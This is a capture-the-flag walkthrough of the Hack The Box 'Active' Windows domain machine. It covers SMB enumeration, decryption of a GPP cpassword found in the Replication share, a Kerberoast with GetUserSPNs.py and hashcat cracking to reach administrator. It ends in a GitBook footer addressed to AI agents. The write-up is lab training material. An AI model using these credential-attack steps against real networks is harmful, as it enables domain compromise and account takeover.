> For the complete documentation index, see [llms.txt](https://angellm.gitbook.io/hacknotes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://angellm.gitbook.io/hacknotes/htb/2022/active.md). # Active **Date**: 27/06/2022 **Difficulty**: Easy **CTF**: *** Let’s start with the classic ping to test the connection with the target machine:

1 packet emitted, 1 packet received. The ttl shows a value of 127 which in HTB means that we are probably against a Windows machine. Let’s do a scan of the TCP ports to find which ones are open:

Wow, it shows a bunch of open TCP ports. Let’s do a further scan in these ports:

We have much information here. First of all we have kerberos, RPC and ldap services. We also have a DNS service in port 53 and a http service running on port 47001. Let’s see if we can any info from the DNS service:

Apparently nothing… Let’s see the http service:

Ok, we also have the port 445 open which is usually used by SMB… Let’s try to obtain more info using crackmapexec:

If we search the Build version, we can find that the target server is a Windows Server 2008 R2, SP1. Now we know that the domain is `active.htb` let’s add it to the `/etc/hosts`.

But the http service looks the same. Let’s try to enumerate the smb:

We have READ permissions to the folder Replication. Let’s look inside!

Every folder at this level was empty.

It seems like it may have interesting files… let’s download all the folder to navigate more quickly: `smbget -R smb://10.129.81.48/Replication`

Maybe we have credentials here? `active.htb\SVC_TGS : edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ`

Is not that simple… Let’s see if the username at least is valid using kerbrute:

Yes, it is. So we have a valid username but not its password I guess. Doing some research, I found [this](https://vk9-sec.com/exploiting-gpp-sysvol-groups-xml/):

So the password seems to be encrypted in AES-256 and we can crack it using gpp-decrypt.

Let’s save this credential in a file.

And now let’s test it:

Yes, it’s valid!

Now, using this credentials we have access to more folders. Let’s look into `Users`:

Can we list the Administrator folder?

Nope. Let’s try with the rest:

Apparently the userflag is in `Users/SVC_TGS/Desktop` path. Let’s download it!

After enumerate the SMB I have found nothing else interesting, let’s try to do a `ldapdomaindumpH`

As we saw earlier it is a Windows Server 2008 R2 SP1.

Apparently there are only 4 users * SVC\_TGS: we have its credentials * krbtgt: Key Distribution Center Service Account * Guest * Administrator Let’s try a Kerberoast attack: `❯ sudo python3 /home/angellm/THM/CTF/Relevant/impacket/build/scripts-3.9/GetUserSPNs.py active.htb/SVC_TGS:GP#################18 -dc-ip 10.129.104.47 -request`

Let’s now try to crack the hash using hashcat: `hashcat -m 13100 -a 0 kerberoast_result /usr/share/wordlists/rockyou.txt`

Cracked! Let’s see if this credentials are correct:

Yeah, Pwned! Let’s go for the root flag:

Done! --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://angellm.gitbook.io/hacknotes/htb/2022/active.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.